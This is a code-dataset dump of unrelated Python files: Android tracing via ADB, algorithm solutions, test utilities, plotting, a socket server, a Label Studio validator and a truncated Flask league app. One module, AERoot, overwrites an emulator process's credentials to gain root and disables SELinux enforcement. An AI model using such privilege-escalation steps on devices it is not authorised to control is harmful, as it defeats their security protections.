id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
8143362 | import glob
import os
import sys
import ftrace
import argparse
import time
from ftrace import Ftrace, Interval
from pandas import Series
from saber_common import execCmd
from saber_common import get_out_systrace_path
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='get atrace/ddr/gpu/snoc logs')
parser.add_argument('-t', '--time', dest='time', help='hope to capture time')
args = parser.parse_args()
print args.time
# check system/bin/ddr_clock_read.sh. if dont , push it to phone
os.system('adb root')
# clear phone /data/local/tmp/
os.system('adb shell rm -r /data/local/tmp/')
os.system('adb shell mkdir /data/local/tmp/')
# clear pc tmp dir
os.system('rm -r ./data/tmp/')
status = os.system('adb shell ls /system/bin/ |grep -i ddr_clock_read.sh')
if status != 0:
txt = execCmd('adb push ./toolsForAndroid/ddr_clock_read.sh /system/bin/')
if 'Read-only file system' in txt:
txt = execCmd('adb root')
print txt
txt = execCmd('adb disable-verity')
print txt
os.system('adb reboot')
time.sleep(60)
os.system('adb root')
os.system('adb remount')
txt = execCmd('adb push ./toolsForAndroid/ddr_clock_read.sh /system/bin/')
os.system('adb shell chmod a+x /system/bin/ddr_clock_read.sh')
status = os.system('adb shell ls /system/bin/ |grep -i snoc_clock_read.sh')
if status != 0:
os.system('adb push ./toolsForAndroid/snoc_clock_read.sh /system/bin/')
os.system('adb shell chmod a+x /system/bin/snoc_clock_read.sh')
status = os.system('adb shell ls /system/bin/ |grep -i gpu_clock_read.sh')
if status != 0:
os.system('adb push ./toolsForAndroid/gpu_clock_read.sh /system/bin/')
os.system('adb shell chmod a+x /system/bin/gpu_clock_read.sh')
# clear /data/local/tmp/
# ddr freq analysis
# start get data
CATEGORYS = 'gfx input view webview wm am sm audio video hal res dalvik rs bionic ' \
' power pm ss database network adb aidl sched irq freq ' \
' idle disk memreclaim workq regulators binder_driver binder_lock '
CMD = 'adb shell atrace -b 10240 -t '\
+ args.time + ' -o /data/local/tmp/atrace.out ' + CATEGORYS + ' & '
os.system(CMD)
os.system('adb shell ./system/bin/ddr_clock_read.sh -i 1 -t ' + args.time + ' -o & ')
os.system('adb shell ./system/bin/snoc_clock_read.sh -i 1 -t ' + args.time + ' -o & ')
os.system('adb shell ./system/bin/gpu_clock_read.sh -i 1 -t ' + args.time + ' -o & ')
# wait for data is out
time.sleep(int(args.time) + 20 )
# get all data for data/local/tmp
os.system('adb pull /data/local/tmp/ ./data/')
# use systrace.py to vert atrace.out to systrace.html
os.system('python ./toolsForAndroid/systrace/systrace.py --from-file ./data/tmp/atrace.out -o ' + get_out_systrace_path()) | StarcoderdataPython |
12842410 | <gh_stars>10-100
# Write a program to find the nth super ugly number.
# Super ugly numbers are positive numbers
# whose all prime factors are in the given prime list primes of size k.
# Example:
# Input: n = 12, primes = [2,7,13,19]
# Output: 32
# Explanation: [1,2,4,7,8,13,14,16,19,26,28,32] is the sequence of the first 12
# super ugly numbers given primes = [2,7,13,19] of size 4.
# Note:
# 1 is a super ugly number for any given primes.
# The given numbers in primes are in ascending order.
# 0 < k ≤ 100, 0 < n ≤ 106, 0 < primes[i] < 1000.
# The nth super ugly number is guaranteed to fit in a 32-bit signed integer.
class Solution:
def nthSuperUglyNumber(self, n: int, primes: List[int]) -> int:
ugly = []
ugly.append(1)
idx = [0 for _ in range(len(primes))]
while len(ugly) < n:
tmp = []
mn = float('inf')
for i in range(len(primes)):
tmp.append(ugly[idx[i]] * primes[i])
# print(tmp)
mn = min(tmp)
for i in range(len(primes)):
if tmp[i] == mn:
idx[i] += 1
ugly.append(mn)
# print(ugly, idx)
return ugly[-1] | StarcoderdataPython |
1810780 | <gh_stars>1-10
""" Tests for warnings context managers
"""
from __future__ import division, print_function, absolute_import
import sys
import warnings
import numpy as np
from nose.tools import assert_equal
from nose.tools import assert_raises
from ..testing import (error_warnings, suppress_warnings,
clear_and_catch_warnings, assert_allclose_safely,
get_fresh_mod, assert_re_in)
def assert_warn_len_equal(mod, n_in_context):
mod_warns = mod.__warningregistry__
# Python 3.4 appears to clear any pre-existing warnings of the same type,
# when raising warnings inside a catch_warnings block. So, there is a
# warning generated by the tests within the context manager, but no
# previous warnings.
if 'version' in mod_warns:
assert_equal(len(mod_warns), 2) # including 'version'
else:
assert_equal(len(mod_warns), n_in_context)
def test_assert_allclose_safely():
# Test the safe version of allclose
assert_allclose_safely([1, 1], [1, 1])
assert_allclose_safely(1, 1)
assert_allclose_safely(1, [1, 1])
assert_allclose_safely([1, 1], 1 + 1e-6)
assert_raises(AssertionError, assert_allclose_safely, [1, 1], 1 + 1e-4)
# Broadcastable matrices
a = np.ones((2, 3))
b = np.ones((3, 2, 3))
eps = np.finfo(np.float).eps
a[0, 0] = 1 + eps
assert_allclose_safely(a, b)
a[0, 0] = 1 + 1.1e-5
assert_raises(AssertionError, assert_allclose_safely, a, b)
# Nans in same place
a[0, 0] = np.nan
b[:, 0, 0] = np.nan
assert_allclose_safely(a, b)
# Never equal with nans present, if not matching nans
assert_raises(AssertionError,
assert_allclose_safely, a, b,
match_nans=False)
b[0, 0, 0] = 1
assert_raises(AssertionError, assert_allclose_safely, a, b)
# Test allcloseness of inf, especially np.float128 infs
for dtt in np.sctypes['float']:
a = np.array([-np.inf, 1, np.inf], dtype=dtt)
b = np.array([-np.inf, 1, np.inf], dtype=dtt)
assert_allclose_safely(a, b)
b[1] = 0
assert_raises(AssertionError, assert_allclose_safely, a, b)
# Empty compares equal to empty
assert_allclose_safely([], [])
def assert_warn_len_equal(mod, n_in_context):
mod_warns = mod.__warningregistry__
# Python 3 appears to clear any pre-existing warnings of the same type,
# when raising warnings inside a catch_warnings block. So, there is a
# warning generated by the tests within the context manager, but no
# previous warnings.
if 'version' in mod_warns:
assert_equal(len(mod_warns), 2) # including 'version'
else:
assert_equal(len(mod_warns), n_in_context)
def test_clear_and_catch_warnings():
# Initial state of module, no warnings
my_mod = get_fresh_mod(__name__)
assert_equal(getattr(my_mod, '__warningregistry__', {}), {})
with clear_and_catch_warnings(modules=[my_mod]):
warnings.simplefilter('ignore')
warnings.warn('Some warning')
assert_equal(my_mod.__warningregistry__, {})
# Without specified modules, don't clear warnings during context
with clear_and_catch_warnings():
warnings.warn('Some warning')
assert_warn_len_equal(my_mod, 1)
# Confirm that specifying module keeps old warning, does not add new
with clear_and_catch_warnings(modules=[my_mod]):
warnings.warn('Another warning')
assert_warn_len_equal(my_mod, 1)
# Another warning, no module spec does add to warnings dict, except on
# Python 3 (see comments in `assert_warn_len_equal`)
with clear_and_catch_warnings():
warnings.warn('Another warning')
assert_warn_len_equal(my_mod, 2)
class my_cacw(clear_and_catch_warnings):
class_modules = (sys.modules[__name__],)
def test_clear_and_catch_warnings_inherit():
# Test can subclass and add default modules
my_mod = get_fresh_mod(__name__)
with my_cacw():
warnings.simplefilter('ignore')
warnings.warn('Some warning')
assert_equal(my_mod.__warningregistry__, {})
def test_warn_error():
# Check warning error context manager
n_warns = len(warnings.filters)
with error_warnings():
assert_raises(UserWarning, warnings.warn, 'A test')
with error_warnings() as w: # w not used for anything
assert_raises(UserWarning, warnings.warn, 'A test')
assert_equal(n_warns, len(warnings.filters))
# Check other errors are propagated
def f():
with error_warnings():
raise ValueError('An error')
assert_raises(ValueError, f)
def test_warn_ignore():
# Check warning ignore context manager
n_warns = len(warnings.filters)
with suppress_warnings():
warnings.warn('Here is a warning, you will not see it')
warnings.warn('Nor this one', DeprecationWarning)
with suppress_warnings() as w: # w not used
warnings.warn('Here is a warning, you will not see it')
warnings.warn('Nor this one', DeprecationWarning)
assert_equal(n_warns, len(warnings.filters))
# Check other errors are propagated
def f():
with suppress_warnings():
raise ValueError('An error')
assert_raises(ValueError, f)
def test_assert_re_in():
assert_re_in(".*", "")
assert_re_in(".*", ["any"])
# Should do match not search
assert_re_in("ab", "abc")
assert_raises(AssertionError, assert_re_in, "ab", "cab")
assert_raises(AssertionError, assert_re_in, "ab$", "abc")
# Sufficient to have one entry matching
assert_re_in("ab", ["", "abc", "laskdjf"])
assert_raises(AssertionError, assert_re_in, "ab$", ["ddd", ""])
# Tuples should be ok too
assert_re_in("ab", ("", "abc", "laskdjf"))
assert_raises(AssertionError, assert_re_in, "ab$", ("ddd", ""))
# Shouldn't "match" the empty list
assert_raises(AssertionError, assert_re_in, "", [])
| StarcoderdataPython |
9714214 | <gh_stars>0
"""
2D plotting funtions
"""
from mpl_toolkits.mplot3d import Axes3D
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot as plt
from matplotlib import cm
import h5py
import argparse
import numpy as np
from os.path import exists
import seaborn as sns
def plot_2d_contour(surf_file, surf_name='train_loss', vmin=0.1, vmax=10, vlevel=0.5, show=False):
"""Plot 2D contour map and 3D surface."""
f = h5py.File(surf_file, 'r')
x = np.array(f['xcoordinates'][:])
y = np.array(f['ycoordinates'][:])
X, Y = np.meshgrid(x, y)
if surf_name in f.keys():
Z = np.array(f[surf_name][:])
elif surf_name == 'train_err' or surf_name == 'test_err' :
Z = 100 - np.array(f[surf_name][:])
else:
print ('%s is not found in %s' % (surf_name, surf_file))
print('------------------------------------------------------------------')
print('plot_2d_contour')
print('------------------------------------------------------------------')
print("loading surface file: " + surf_file)
print('len(xcoordinates): %d len(ycoordinates): %d' % (len(x), len(y)))
print('max(%s) = %f \t min(%s) = %f' % (surf_name, np.max(Z), surf_name, np.min(Z)))
print(Z)
if (len(x) <= 1 or len(y) <= 1):
print('The length of coordinates is not enough for plotting contours')
return
# --------------------------------------------------------------------
# Plot 2D contours
# --------------------------------------------------------------------
fig = plt.figure()
CS = plt.contour(X, Y, Z, cmap='summer', levels=np.arange(vmin, vmax, vlevel))
plt.clabel(CS, inline=1, fontsize=8)
fig.savefig(surf_file + '_' + surf_name + '_2dcontour' + '.pdf', dpi=300,
bbox_inches='tight', format='pdf')
fig = plt.figure()
print(surf_file + '_' + surf_name + '_2dcontourf' + '.pdf')
CS = plt.contourf(X, Y, Z, cmap='summer', levels=np.arange(vmin, vmax, vlevel))
fig.savefig(surf_file + '_' + surf_name + '_2dcontourf' + '.pdf', dpi=300,
bbox_inches='tight', format='pdf')
# --------------------------------------------------------------------
# Plot 2D heatmaps
# --------------------------------------------------------------------
fig = plt.figure()
sns_plot = sns.heatmap(Z, cmap='viridis', cbar=True, vmin=vmin, vmax=vmax,
xticklabels=False, yticklabels=False)
sns_plot.invert_yaxis()
sns_plot.get_figure().savefig(surf_file + '_' + surf_name + '_2dheat.pdf',
dpi=300, bbox_inches='tight', format='pdf')
# --------------------------------------------------------------------
# Plot 3D surface
# --------------------------------------------------------------------
fig = plt.figure()
ax = Axes3D(fig)
surf = ax.plot_surface(X, Y, Z, cmap=cm.coolwarm, linewidth=0, antialiased=False)
fig.colorbar(surf, shrink=0.5, aspect=5)
fig.savefig(surf_file + '_' + surf_name + '_3dsurface.pdf', dpi=300,
bbox_inches='tight', format='pdf')
f.close()
if show: plt.show()
def plot_trajectory(proj_file, dir_file, show=False):
""" Plot optimization trajectory on the plane spanned by given directions."""
print(proj_file)
assert exists(proj_file), 'Projection file does not exist.'
f = h5py.File(proj_file, 'r')
fig = plt.figure()
plt.plot(f['proj_xcoord'], f['proj_ycoord'], marker='.')
plt.tick_params('y', labelsize='x-large')
plt.tick_params('x', labelsize='x-large')
f.close()
if exists(dir_file):
f2 = h5py.File(dir_file,'r')
if 'explained_variance_ratio_' in f2.keys():
ratio_x = f2['explained_variance_ratio_'][0]
ratio_y = f2['explained_variance_ratio_'][1]
plt.xlabel('1st PC: %.2f %%' % (ratio_x*100), fontsize='xx-large')
plt.ylabel('2nd PC: %.2f %%' % (ratio_y*100), fontsize='xx-large')
f2.close()
fig.savefig(proj_file + '.pdf', dpi=300, bbox_inches='tight', format='pdf')
if show: plt.show()
def plot_contour_trajectory(surf_file, dir_file, proj_file, surf_name='loss_vals',
vmin=0.1, vmax=10, vlevel=0.5, show=False):
"""2D contour + trajectory"""
assert exists(surf_file) and exists(proj_file) and exists(dir_file)
# plot contours
f = h5py.File(surf_file,'r')
x = np.array(f['xcoordinates'][:])
y = np.array(f['ycoordinates'][:])
X, Y = np.meshgrid(x, y)
if surf_name in f.keys():
Z = np.array(f[surf_name][:])
fig = plt.figure()
CS1 = plt.contour(X, Y, Z, levels=np.arange(vmin, vmax, vlevel))
CS2 = plt.contour(X, Y, Z, levels=np.logspace(1, 8, num=8))
# plot trajectories
pf = h5py.File(proj_file, 'r')
plt.plot(pf['proj_xcoord'], pf['proj_ycoord'], marker='.')
# plot red points when learning rate decays
# for e in [150, 225, 275]:
# plt.plot([pf['proj_xcoord'][e]], [pf['proj_ycoord'][e]], marker='.', color='r')
# add PCA notes
df = h5py.File(dir_file,'r')
ratio_x = df['explained_variance_ratio_'][0]
ratio_y = df['explained_variance_ratio_'][1]
plt.xlabel('1st PC: %.2f %%' % (ratio_x*100), fontsize='xx-large')
plt.ylabel('2nd PC: %.2f %%' % (ratio_y*100), fontsize='xx-large')
df.close()
plt.clabel(CS1, inline=1, fontsize=6)
plt.clabel(CS2, inline=1, fontsize=6)
fig.savefig(proj_file + '_' + surf_name + '_2dcontour_proj.pdf', dpi=300,
bbox_inches='tight', format='pdf')
pf.close()
if show: plt.show()
def plot_2d_eig_ratio(surf_file, val_1='min_eig', val_2='max_eig', show=False):
""" Plot the heatmap of eigenvalue ratios, i.e., |min_eig/max_eig| of hessian """
print('------------------------------------------------------------------')
print('plot_2d_eig_ratio')
print('------------------------------------------------------------------')
print("loading surface file: " + surf_file)
f = h5py.File(surf_file,'r')
x = np.array(f['xcoordinates'][:])
y = np.array(f['ycoordinates'][:])
X, Y = np.meshgrid(x, y)
Z1 = np.array(f[val_1][:])
Z2 = np.array(f[val_2][:])
# Plot 2D heatmaps with color bar using seaborn
abs_ratio = np.absolute(np.divide(Z1, Z2))
print(abs_ratio)
fig = plt.figure()
sns_plot = sns.heatmap(abs_ratio, cmap='viridis', vmin=0, vmax=.5, cbar=True,
xticklabels=False, yticklabels=False)
sns_plot.invert_yaxis()
sns_plot.get_figure().savefig(surf_file + '_' + val_1 + '_' + val_2 + '_abs_ratio_heat_sns.pdf',
dpi=300, bbox_inches='tight', format='pdf')
# Plot 2D heatmaps with color bar using seaborn
ratio = np.divide(Z1, Z2)
print(ratio)
fig = plt.figure()
sns_plot = sns.heatmap(ratio, cmap='viridis', cbar=True, xticklabels=False, yticklabels=False)
sns_plot.invert_yaxis()
sns_plot.get_figure().savefig(surf_file + '_' + val_1 + '_' + val_2 + '_ratio_heat_sns.pdf',
dpi=300, bbox_inches='tight', format='pdf')
f.close()
if show: plt.show()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Plot 2D loss surface')
parser.add_argument('--surf_file', '-f', default='', help='The h5 file that contains surface values')
parser.add_argument('--dir_file', default='', help='The h5 file that contains directions')
parser.add_argument('--proj_file', default='', help='The h5 file that contains the projected trajectories')
parser.add_argument('--surf_name', default='train_loss', help='The type of surface to plot')
parser.add_argument('--vmax', default=10, type=float, help='Maximum value to map')
parser.add_argument('--vmin', default=0.1, type=float, help='Miminum value to map')
parser.add_argument('--vlevel', default=0.5, type=float, help='plot contours every vlevel')
parser.add_argument('--zlim', default=10, type=float, help='Maximum loss value to show')
parser.add_argument('--show', action='store_true', default=False, help='show plots')
args = parser.parse_args()
if exists(args.surf_file) and exists(args.proj_file) and exists(args.dir_file):
plot_contour_trajectory(args.surf_file, args.dir_file, args.proj_file,
args.surf_name, args.vmin, args.vmax, args.vlevel, args.show)
elif exists(args.proj_file) and exists(args.dir_file):
plot_trajectory(args.proj_file, args.dir_file, args.show)
elif exists(args.surf_file):
plot_2d_contour(args.surf_file, args.surf_name, args.vmin, args.vmax, args.vlevel, args.show)
| StarcoderdataPython |
11297484 | import itertools
import jinja2
import os
import re
import tempfile
import subprocess
from server import highlight
from tests import OkTestCase, skipIfWindows
_striptags_re = re.compile(r'(<!--.*?-->|<[^>]*>)')
def striptags(s):
stripped = _striptags_re.sub('', s)
return jinja2.Markup(stripped).unescape()
def apply_patch(patch, source):
"""Applies a patch to a source string, returning the result string."""
with tempfile.NamedTemporaryFile('w+') as infile:
with tempfile.NamedTemporaryFile('r') as outfile:
infile.write(source)
proc = subprocess.Popen(['patch', '-p0', '-o', outfile.name, infile.name],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True)
outs, errs = proc.communicate(input=patch)
if proc.returncode != 0:
raise AssertionError('patch failed: {0}'.format(errs))
return outfile.read()
class TestHighlight(OkTestCase):
def setUp(self):
super(TestHighlight, self).setUp()
with open('tests/files/difflib_before.py', encoding='utf-8') as fobj:
before = fobj.read()
with open('tests/files/difflib_after.py', encoding='utf-8') as fobj:
after = fobj.read()
self.files = {
'before.py': before,
'after.py': after,
'empty.py': '',
'empty': '',
}
def _test_highlight_file(self, filename, source):
source_lines = source.splitlines(keepends=True)
highlighted = list(highlight.highlight_file(filename, source))
# Check format
for line in highlighted:
assert source_lines[line.line_after - 1] == striptags(line.contents)
# Check that removing tags gives the same file
assert source_lines == [striptags(line.contents) for line in highlighted]
def _test_highlight_diff(self, filename, a, b, diff_type):
a_lines = a.splitlines(keepends=True)
b_lines = b.splitlines(keepends=True)
highlighted = list(highlight.highlight_diff(filename, a, b, diff_type))
# Check format
for line in highlighted:
stripped = striptags(line.contents)
start = stripped[0]
source = stripped[1:]
if line.tag == 'header':
assert line.line_before is None
assert line.line_after is None
elif line.tag == 'delete':
assert start == '-'
assert a_lines[line.line_before - 1] == source
assert line.line_after is None
elif line.tag == 'insert':
assert start == '+'
assert line.line_before is None
assert b_lines[line.line_after - 1] == source
elif line.tag == 'equal':
assert start == ' '
assert a_lines[line.line_before - 1] == source
assert b_lines[line.line_after - 1] == source
else:
raise AssertionError('Unknown tag {0}'.format(line.tag))
# Check that removing tags gives a patch that can be applied
patch = ''.join(striptags(line.contents) for line in highlighted)
assert b_lines == apply_patch(patch, a).splitlines(keepends=True)
def test_highlight_file(self):
for filename, source in self.files.items():
self._test_highlight_file(filename, source)
@skipIfWindows
def test_highlight_diff(self):
for diff_type in ('short', 'full'):
for a, b in itertools.combinations(self.files.values(), 2):
self._test_highlight_diff('test.py', a, b, diff_type)
def test_no_highlight(self):
filename = 'data'
source = 'It was the best of times, it was the worst of times, ...\n'
source_lines = source.splitlines(keepends=True)
highlighted = list(highlight.highlight_file(filename, source))
for line in highlighted:
assert source_lines[line.line_after - 1] == striptags(line.contents)
assert source_lines == [line.contents for line in highlighted]
| StarcoderdataPython |
9660320 | #! /usr/bin/env python
# A rather specialized script to make sure that a symbolic link named
# RCS exists pointing to a real RCS directory in a parallel tree
# referenced as RCStree in an ancestor directory.
# (I use this because I like my RCS files to reside on a physically
# different machine).
import os
def main():
rcstree = 'RCStree'
rcs = 'RCS'
if os.path.islink(rcs):
print('%r is a symlink to %r' % (rcs, os.readlink(rcs)))
return
if os.path.isdir(rcs):
print('%r is an ordinary directory' % (rcs,))
return
if os.path.exists(rcs):
print('%r is a file?!?!' % (rcs,))
return
#
p = os.getcwd()
up = ''
down = ''
# Invariants:
# (1) join(p, down) is the current directory
# (2) up is the same directory as p
# Ergo:
# (3) join(up, down) is the current directory
#print 'p =', repr(p)
while not os.path.isdir(os.path.join(p, rcstree)):
head, tail = os.path.split(p)
#print 'head = %r; tail = %r' % (head, tail)
if not tail:
print('Sorry, no ancestor dir contains %r' % (rcstree,))
return
p = head
up = os.path.join(os.pardir, up)
down = os.path.join(tail, down)
#print 'p = %r; up = %r; down = %r' % (p, up, down)
there = os.path.join(up, rcstree)
there = os.path.join(there, down)
there = os.path.join(there, rcs)
if os.path.isdir(there):
print('%r already exists' % (there, ))
else:
print('making %r' % (there,))
makedirs(there)
print('making symlink %r -> %r' % (rcs, there))
os.symlink(there, rcs)
def makedirs(p):
if not os.path.isdir(p):
head, tail = os.path.split(p)
makedirs(head)
os.mkdir(p, 0o777)
if __name__ == "__main__":
main()
| StarcoderdataPython |
8138739 | <filename>server-socket.py<gh_stars>0
import socket
import mongoconn as CONN
import json
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip='192.168.1.103'
s.bind((ip,1238))
s.listen(2)
while True:
clientsocket, address = s.accept()
clientsocket.send(bytes("connection established","utf-8"))
cliente = clientsocket.getsockname()
print(f"benvenuto {cliente}")
msg= clientsocket.recv(1024)
print(msg.decode("utf-8"))
#riceve oggetto da client vase
ogg_json = clientsocket.recv(1024)
print(ogg_json.decode("utf-8"))
clientsocket.close()
dati = json.loads(ogg_json)
try:
CONN.insert_dati(dati)
except:
print("errore chiamata a funzione CONN")
| StarcoderdataPython |
11275481 | """This file and its contents are licensed under the Apache License 2.0. Please see the included NOTICE for copyright information and LICENSE for a copy of the license.
"""
import logging
import ujson as json
from urllib.parse import urlparse
from django.conf import settings
from rest_framework.exceptions import ValidationError
from core.label_config import replace_task_data_undefined_with_config_field
class SkipField(Exception):
pass
_DATA_TYPES = {
'Text': [str, int, float],
'Header': [str, int, float],
'HyperText': [str],
'Image': [str, list],
'Paragraphs': [list, str],
'Table': [dict],
'TimeSeries': [dict, list, str],
'TimeSeriesChannel': [dict, list, str]
}
logger = logging.getLogger(__name__)
class TaskValidator:
""" Task Validator with project scheme configs validation. It is equal to TaskSerializer from django backend.
"""
def __init__(self, project, instance=None):
self.project = project
self.instance = instance
self.annotation_count = 0
self.prediction_count = 0
@staticmethod
def check_data(project, data):
""" Validate data from task['data']
"""
if data is None:
raise ValidationError('Task is empty (None)')
replace_task_data_undefined_with_config_field(data, project)
# iterate over data types from project
for data_key, data_type in project.data_types.items():
# get array name in case of Repeater tag
is_array = '[' in data_key
data_key = data_key.split('[')[0]
if data_key not in data:
raise ValidationError('"{data_key}" key is expected in task data'.format(data_key=data_key))
if is_array:
expected_types = (list, )
else:
expected_types = _DATA_TYPES.get(data_type, (str,))
if not isinstance(data[data_key], tuple(expected_types)):
raise ValidationError('data[\'{data_key}\']={data_value} is of type \'{type}\', '
"but the object tag {data_type} expects the following types: {expected_types}"
.format(data_key=data_key, data_value=data[data_key],
type=type(data[data_key]).__name__, data_type=data_type,
expected_types=[e.__name__ for e in expected_types]))
if data_type == 'List':
for item in data[data_key]:
key = 'text' # FIXME: read key from config (elementValue from List)
if key not in item:
raise ValidationError('Each item from List must have key ' + key)
return data
@staticmethod
def check_data_and_root(project, data, dict_is_root=False):
""" Check data consistent and data is dict with task or dict['task'] is task
:param project:
:param data:
:param dict_is_root:
:return:
"""
try:
TaskValidator.check_data(project, data)
except ValidationError as e:
if dict_is_root:
raise ValidationError(e.detail[0] + ' [assume: item as is = task root with values] ')
else:
raise ValidationError(e.detail[0] + ' [assume: item["data"] = task root with values]')
@staticmethod
def check_allowed(task):
# task is required
if 'data' not in task:
return False
# everything is ok
return True
@staticmethod
def raise_if_wrong_class(task, key, class_def):
if key in task and not isinstance(task[key], class_def):
raise ValidationError('Task[{key}] must be {class_def}'.format(key=key, class_def=class_def))
def validate(self, task):
""" Validate whole task with task['data'] and task['annotations']. task['predictions']
"""
# task is class
if hasattr(task, 'data'):
self.check_data_and_root(self.project, task.data)
return task
# self.instance is loaded by get_object of view
if self.instance and hasattr(self.instance, 'data'):
if isinstance(self.instance.data, dict):
data = self.instance.data
elif isinstance(self.instance.data, str):
try:
data = json.loads(self.instance.data)
except ValueError as e:
raise ValidationError("Can't parse task data: " + str(e))
else:
raise ValidationError('Field "data" must be string or dict, but not "' + type(self.instance.data) + '"')
self.check_data_and_root(self.instance.project, data)
return task
# check task is dict
if not isinstance(task, dict):
raise ValidationError('Task root must be dict with "data", "meta", "annotations", "predictions" fields')
# task[data] | task[annotations] | task[predictions] | task[meta]
if self.check_allowed(task):
# task[data]
self.raise_if_wrong_class(task, 'data', (dict, list))
self.check_data_and_root(self.project, task['data'])
# task[annotations]: we can't use AnnotationSerializer for validation
# because it's much different with validation we need here
self.raise_if_wrong_class(task, 'annotations', list)
for annotation in task.get('annotations', []):
ok = 'result' in annotation
if not ok:
raise ValidationError('Annotation must have "result" fields')
# check result is list
if not isinstance(annotation.get('result', []), list):
raise ValidationError('"result" field in annotation must be list')
# task[predictions]
self.raise_if_wrong_class(task, 'predictions', list)
for prediction in task.get('predictions', []):
ok = 'result' in prediction
if not ok:
raise ValidationError('Prediction must have "result" fields')
# task[meta]
self.raise_if_wrong_class(task, 'meta', (dict, list))
# task is data as is, validate task as data and move it to task['data']
else:
self.check_data_and_root(self.project, task, dict_is_root=True)
task = {'data': task}
return task
@staticmethod
def format_error(i, detail, item):
if len(detail) == 1:
code = (str(detail[0].code + ' ')) if detail[0].code != "invalid" else ''
return 'Error {code} at item {i}: {detail} :: {item}'\
.format(code=code, i=i, detail=detail[0], item=item)
else:
errors = ', '.join(detail)
codes = str([d.code for d in detail])
return 'Errors {codes} at item {i}: {errors} :: {item}'\
.format(codes=codes, i=i, errors=errors, item=item)
def to_internal_value(self, data):
""" Body of run_validation for all data items
"""
if data is None:
raise ValidationError('All tasks are empty (None)')
if not isinstance(data, list):
raise ValidationError('data is not a list')
if len(data) == 0:
raise ValidationError('data is empty')
ret, errors = [], []
self.annotation_count, self.prediction_count = 0, 0
for i, item in enumerate(data):
try:
validated = self.validate(item)
except ValidationError as exc:
error = self.format_error(i, exc.detail, item)
errors.append(error)
# do not print to user too many errors
if len(errors) >= 100:
errors[99] = '...'
break
else:
ret.append(validated)
errors.append({})
if 'annotations' in item:
self.annotation_count += len(item['annotations'])
if 'predictions' in item:
self.prediction_count += len(item['predictions'])
if any(errors):
logger.warning('Can\'t deserialize tasks due to ' + str(errors))
raise ValidationError(errors)
return ret
def is_url(string):
try:
result = urlparse(string.strip())
return all([result.scheme, result.netloc])
except ValueError:
return False
| StarcoderdataPython |
3576601 | """
AERoot main module
"""
from enum import IntEnum, auto
from aeroot.avd import Avd, AVDError, AmbiguousProcessNameError
class ProcessNotRunningError(Exception): pass
class AERootError(Exception): pass
class Mode(IntEnum):
PID = auto()
NAME = auto()
class AERoot:
def __init__(self, options):
self.options = options
self.avd = None
def do_root(self):
try:
self.avd = Avd(self.options.device, self.options.host, self.options.port)
if self.options.mode == Mode.NAME:
self.options.pid = self.avd.get_pid(self.options.process_name)
if self.options.pid is None:
raise ProcessNotRunningError
self.avd.overwrite_credentials(self.options.pid)
self.avd.selinux_setenforce(0)
except AVDError as err:
raise AERootError(err)
except AmbiguousProcessNameError:
msg = (
"Several processes with the same name are currently running",
"You should use the pid to target the process"
)
raise AERootError("\n".join(msg))
def cleanup(self):
if self.avd is not None:
self.avd.close()
| StarcoderdataPython |
3467284 | <gh_stars>0
from flask import Flask, render_template
from flask import request
from flask.ext import restful
from flask.ext.restful import reqparse
from tasks.League import League
from tasks.Fixture import Fixture
import csv
import os
app = Flask(__name__)
@app.route('/')
def index():
print request.url
return render_template('index.html', country='NULL', season='NULL', homeTeam='NULL', awayTeam='NULL', homeTeamList=None, awayTeamList=None)
@app.route('/api/v1.0/league', methods=['GET'])
def getTask():
if request.method == "GET":
country = request.args.get('country')
season = request.args.get('season')
homeTeam = request.args.get('homeTeam')
awayTeam = request.args.get('awayTeam')
if country != 'NULL' and season != 'NULL' and homeTeam != 'NULL' and awayTeam != 'NULL':
teamList = getTeamList(country, season)
htmlTable = processLeague(season, country, homeTeam, awayTeam)
return render_template('league.html', country=country, season=season, homeTeam=homeTeam, awayTeam=awayTeam, homeTeamList=teamList, awayTeamList=teamList, htmlTable=htmlTable)
elif country != 'NULL' and season != 'NULL' and (homeTeam == 'NULL' or awayTeam == 'NULL'):
teamList = getTeamList(country, season)
return render_template('index.html', country=country, season=season, homeTeam=homeTeam, awayTeam=awayTeam, homeTeamList=teamList, awayTeamList=teamList)
else:
return render_template('index.html', country=country, season=season, homeTeam='NULL', awayTeam='NULL', homeTeamList=None, awayTeamList=None)
def processLeague(season, country, homeTeam, awayTeam):
fixtureList = getFixtureList(country, season)
teamList = getTeamList(country, season)
league = League(country, season)
league.addFixtures(fixtureList)
htmlTable = league.getHTMLTable()
return htmlTable
def getTeamList(country, season):
countryList = {}
seasonList = {}
teamList = []
seasonList['2015-2016'] = '1615'
seasonList['2014-2015'] = '1514'
seasonList['2013-2014'] = '1413'
seasonList['2012-2013'] = '1312'
seasonList['2011-2012'] = '1211'
seasonList['2010-2011'] = '1110'
seasonList['2009-2010'] = '1009'
seasonList['2008-2009'] = '0908'
countryList['Belgium'] = 'B1'
countryList['England'] = 'E0'
countryList['France'] = 'F1'
countryList['Holland'] = 'N1'
countryList['Germany'] = 'D1'
countryList['Greece'] = 'G1'
countryList['Italy'] = 'I1'
countryList['Spain'] = 'SP1'
countryList['Scotland'] = 'SC0'
countryList['Turkey'] = 'T1'
seasonPath = seasonList[season]
countryPath = countryList[country]
filePath = 'data/{0}/{1}.csv'.format(seasonPath, countryPath)
if os.path.exists(filePath):
inputFile = open(filePath, 'r')
for index, line in enumerate(inputFile):
if index > 0:
elements = line.rstrip().split(',')
if elements[2] not in teamList:
teamList.append(elements[2])
teamList.sort()
return teamList
else:
return None
def getFixtureList(country, season):
countryList = {}
seasonList = {}
fixtureList = []
seasonList['2015-2016'] = '1615'
seasonList['2014-2015'] = '1514'
seasonList['2013-2014'] = '1413'
seasonList['2012-2013'] = '1312'
seasonList['2011-2012'] = '1211'
seasonList['2010-2011'] = '1110'
seasonList['2009-2010'] = '1009'
seasonList['2008-2009'] = '0908'
countryList['Belgium'] = 'B1'
countryList['England'] = 'E0'
countryList['France'] = 'F1'
countryList['Holland'] = 'N1'
countryList['Germany'] = 'D1'
countryList['Greece'] = 'G1'
countryList['Italy'] = 'I1'
countryList['Spain'] = 'SP1'
countryList['Scotland'] = 'SC0'
countryList['Turkey'] = 'T1'
seasonPath = seasonList[season]
countryPath = countryList[country]
